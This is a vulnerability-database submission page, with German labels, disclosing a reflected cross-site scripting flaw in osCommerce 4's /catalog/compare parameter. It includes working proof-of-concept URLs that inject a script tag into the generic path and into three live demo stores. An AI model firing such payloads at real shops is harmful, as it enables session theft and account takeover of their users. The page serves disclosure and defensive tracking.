| Titel | osCommerce ltd. osCommerce 4 Reflected XSS |
|---|
| Beschreibung | # Exploit Title: osCommerce 4 - Reflected XSS
# Exploit Author: skalvin aka (CraCkEr)
# Date: 13/11/2023
# Vendor: osCommerce ltd.
# Vendor Homepage: https://www.oscommerce.com/
# Software Link: https://demo.oscommerce.com/
# Demo Link: https://demo.oscommerce.com/printshop/
# Tested on: Windows 11 Home
# Impact: Manipulate the content of the site
# CWE: CWE-79 - CWE-74 - CWE-707
## Description
Attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
Path: /catalog/compare
GET parameter 'compare[]' is vulnerable to XSS
https://website/catalog/compare?compare[]=40dz4iq"><script>alert(1)</script>zohkx
Live POC:
https://demo.oscommerce.com/printshop/catalog/compare?compare[]=40dz4iq"><script>alert(1)</script>zohkx
https://demo.oscommerce.com/furniture/catalog/compare?compare[]=40dz4iq"><script>alert(1)</script>zohkx
https://demo.oscommerce.com/watch/catalog/compare?compare[]=40dz4iq"><script>alert(1)</script>zohkx
[-] Done |
|---|
| Quelle | ⚠️ https://demo.oscommerce.com/printshop/catalog/compare?compare[]=40dz4iq"><script>alert(1)</script>zohkx |
|---|
| Benutzer | skalvin (UID 49463) |
|---|
| Einreichung | 13.11.2023 21:48 (vor 3 Jahren) |
|---|
| Moderieren | 26.11.2023 08:20 (12 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 246122 [osCommerce 4 Instant Message /catalog/compare Cross Site Scripting] |
|---|
| Punkte | 20 |
|---|